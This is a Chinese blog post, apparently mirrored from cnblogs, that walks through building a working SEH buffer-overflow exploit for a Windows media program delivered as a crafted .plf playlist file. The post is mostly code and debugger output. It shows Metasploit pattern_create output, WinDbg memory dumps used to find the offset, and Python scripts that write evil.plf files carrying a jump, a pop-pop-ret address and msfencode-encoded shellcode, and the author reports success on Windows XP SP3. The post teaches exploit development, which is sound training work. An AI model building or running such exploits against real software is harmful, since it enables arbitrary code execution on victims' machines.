zoukankan      html  css  js  c++  java
  • find pattern

    daniel@daniel-mint ~/msf/metasploit-framework/tools $ ruby pattern_create.rb 2000
    Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
    

    生成定位pattern

    根据pattern查找位置

    0:000> db poi(fs:0)
    0012f2c8  32 41 75 33 41 75 34 41-75 35 41 75 36 41 75 37  2Au3Au4Au5Au6Au7
    0012f2d8  41 75 38 41 75 39 41 76-30 41 76 31 41 76 32 41  Au8Au9Av0Av1Av2A
    0012f2e8  76 33 41 76 34 41 76 35-41 76 36 41 76 37 41 76  v3Av4Av5Av6Av7Av
    0012f2f8  38 41 76 39 41 77 30 41-77 31 41 77 32 41 77 33  8Av9Aw0Aw1Aw2Aw3
    0012f308  41 77 34 41 77 35 41 77-36 41 77 37 41 77 38 41  Aw4Aw5Aw6Aw7Aw8A
    0012f318  77 39 41 78 30 41 78 31-41 78 32 41 78 33 41 78  w9Ax0Ax1Ax2Ax3Ax
    0012f328  34 41 78 35 41 78 36 41-78 37 41 78 38 41 78 39  4Ax5Ax6Ax7Ax8Ax9
    0012f338  41 79 30 41 79 31 41 79-32 41 79 33 41 79 34 41  Ay0Ay1Ay2Ay3Ay4A
    

      

    Prelude> zip [1..100] ['a'..'z']
    [(1,'a'),(2,'b'),(3,'c'),(4,'d'),(5,'e'),(6,'f'),(7,'g'),(8,'h'),(9,'i'),(10,'j'),(11,'k'),(12,'l'),(13,'m'),(14,'n'),(15,'o'),(16,'p'),(17,'q'),(18,'r'),(19,'s'),(20,'t'),(21,'u'),(22,'v'),(23,'w'),(24,'x'),(25,'y'),(26,'z')]
    

      

    因此Au3-Aa0 = [u-a] * 10 + [3 - 0 ] = (21 - 1) * 10 + 3 = 203,即Au3是第203个三元组

    所以2Au3是在203*3 = 609偏移处

    或者

    At9-Aa0 = [t - a + 1] * 10 = 200组,占据了600个字节,

    Au0Au1Au2Au3

    Prelude> zip [601..700] ['A','u','0','A','u','1','A','u','2','A','u','3']
    [(601,'A'),(602,'u'),(603,'0'),(604,'A'),(605,'u'),(606,'1'),(607,'A'),(608,'u'),(609,'2'),(610,'A'),(611,'u'),(612,'3')]
    

      

    因此是609偏移,或者说占据了609-612这四个字节。

     参考:http://www.fuzzysecurity.com/tutorials/expDev/3.html

    filename="evil.plf"

    buffer = "A"*608 + "B"*4 + "C"*4 + "D"*(2000 - 608 - 8 - 8)

    textfile = open(filename , 'w')
    textfile.write(buffer)
    textfile.close()

      

    0:000> dd poi(fs:0)
    0012f2c8  42424242 43434343 44444444 44444444
    0012f2d8  44444444 44444444 44444444 44444444
    0012f2e8  44444444 44444444 44444444 44444444
    0012f2f8  44444444 44444444 44444444 44444444
    0012f308  44444444 44444444 44444444 44444444
    0012f318  44444444 44444444 44444444 44444444
    0012f328  44444444 44444444 44444444 44444444
    0012f338  44444444 44444444 44444444 44444444
    

      

    filename="evil1.plf"
     
    buf = "A"*608 + "xebx06x90x90" + "xb6xf7x47x00"
    buf += "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8b"
    buf += "x52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
    buf += "x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20"
    buf += "xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8b"
    buf += "x42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0"
    buf += "x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8b"
    buf += "x34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01"
    buf += "xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2"
    buf += "x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1c"
    buf += "x01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5b"
    buf += "x61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86"
    buf += "x5dx6ax01x8dx85xb9x00x00x00x50x68x31x8b"
    buf += "x6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95xbd"
    buf += "x9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbb"
    buf += "x47x13x72x6fx6ax00x53xffxd5x63x61x6cx63"
    buf += "x2ex65x78x65x00"
    buf += "D"*(2000 - 608 - 8 - 8 - 200)
    
      
    textfile = open(filename , 'w')
    textfile.write(buf)
    textfile.close()
    

      

    这种方式,并没有exploit成功,原因是shellcode中不能有x00,这会使字符串截止,而且msfpayload生成的payload中也包含x00,也无法使用。

    因此需要使用msfencode进行加密,

    daniel@daniel-mint ~/msf/metasploit-framework $ ruby msfpayload windows/exec CMD=calc.exe R | ruby msfencode -b 'x00x0dx0ax1a' -t python -e x86/call4_dword_xor 
    WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.9.1WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.9.1
    
    [*] x86/call4_dword_xor succeeded with size 224 (iteration=1)
    
    buf =  ""
    buf += "x2bxc9x83xe9xcexe8xffxffxffxffxc0x5ex81"
    buf += "x76x0exdcx84x22x40x83xeexfcxe2xf4x20x6c"
    buf += "xabx40xdcx84x42xc9x39xb5xf0x24x57xd6x12"
    buf += "xcbx8ex88xa9x12xc8x0fx50x68xd3x33x68x66"
    buf += "xedx7bx13x80x70xb8x43x3cxdexa8x02x81x13"
    buf += "x89x23x87x3ex74x70x17x57xd6x32xcbx9exb8"
    buf += "x23x90x57xc4x5axc5x1cxf0x68x41x0cxd4xa9"
    buf += "x08xc4x0fx7ax60xddx57xc1x7cx95x0fx16xcb"
    buf += "xddx52x13xbfxedx44x8ex81x13x89x23x87xe4"
    buf += "x64x57xb4xdfxf9xdax7bxa1xa0x57xa2x84x0f"
    buf += "x7ax64xddx57x44xcbxd0xcfxa9x18xc0x85xf1"
    buf += "xcbxd8x0fx23x90x55xc0x06x64x87xdfx43x19"
    buf += "x86xd5xddxa0x84xdbx78xcbxcex6fxa4x1dxb6"
    buf += "x85xafxc5x65x84x22x40x8cxecx13xcbxb3x03"
    buf += "xddx95x67x74x97xe2x8axecx84xd5x61x19xdd"
    buf += "x95xe0x82x5ex4ax5cx7fxc2x35xd9x3fx65x53"
    buf += "xaexebx48x40x8fx7bxf7x23xbdxe8x41x6exb9"
    buf += "xfcx47x40"
    

      

    然后写入shellcode

    filename="evil1.plf"
     
    buf = "A"*608 + "xebx06x90x90" + "xedx7ax03x64"
    buf += "x90"*20
    buf += "x2bxc9x83xe9xcexe8xffxffxffxffxc0x5ex81"
    buf += "x76x0exdcx84x22x40x83xeexfcxe2xf4x20x6c"
    buf += "xabx40xdcx84x42xc9x39xb5xf0x24x57xd6x12"
    buf += "xcbx8ex88xa9x12xc8x0fx50x68xd3x33x68x66"
    buf += "xedx7bx13x80x70xb8x43x3cxdexa8x02x81x13"
    buf += "x89x23x87x3ex74x70x17x57xd6x32xcbx9exb8"
    buf += "x23x90x57xc4x5axc5x1cxf0x68x41x0cxd4xa9"
    buf += "x08xc4x0fx7ax60xddx57xc1x7cx95x0fx16xcb"
    buf += "xddx52x13xbfxedx44x8ex81x13x89x23x87xe4"
    buf += "x64x57xb4xdfxf9xdax7bxa1xa0x57xa2x84x0f"
    buf += "x7ax64xddx57x44xcbxd0xcfxa9x18xc0x85xf1"
    buf += "xcbxd8x0fx23x90x55xc0x06x64x87xdfx43x19"
    buf += "x86xd5xddxa0x84xdbx78xcbxcex6fxa4x1dxb6"
    buf += "x85xafxc5x65x84x22x40x8cxecx13xcbxb3x03"
    buf += "xddx95x67x74x97xe2x8axecx84xd5x61x19xdd"
    buf += "x95xe0x82x5ex4ax5cx7fxc2x35xd9x3fx65x53"
    buf += "xaexebx48x40x8fx7bxf7x23xbdxe8x41x6exb9"
    buf += "xfcx47x40"
    buf += "D"*(2000 - 608 - 8 - 8 - 224-20)
    
      
    textfile = open(filename , 'w')
    textfile.write(buf)
    textfile.close()
    

      

     用下面平台测试,exploit成功。

    Exploit Development: Backtrack 5
    Debugging Machine: Windows XP PRO SP3
    Vulnerable Software: Download

  • 相关阅读:
    WebBrowser一点心得,如果在Javascript和Winform代码之间实现双向通信
    PHP
    ASP.NET的路由系统:根据路由规则生成URL
    数据库的范式模型
    P2P编程
    MS CRM 2011的自定义与开发(12)——表单脚本扩展开发(4)
    Html.RenderPartial和Html.Partial在Razor视图中的区别
    如何在本地安装 DotNetNuke 6
    ASP.NET的路由系统:路由映射
    ASP.NET Web API: 宿主(Hosting)
  • 原文地址:https://www.cnblogs.com/long123king/p/3833869.html
Copyright © 2011-2022 走看看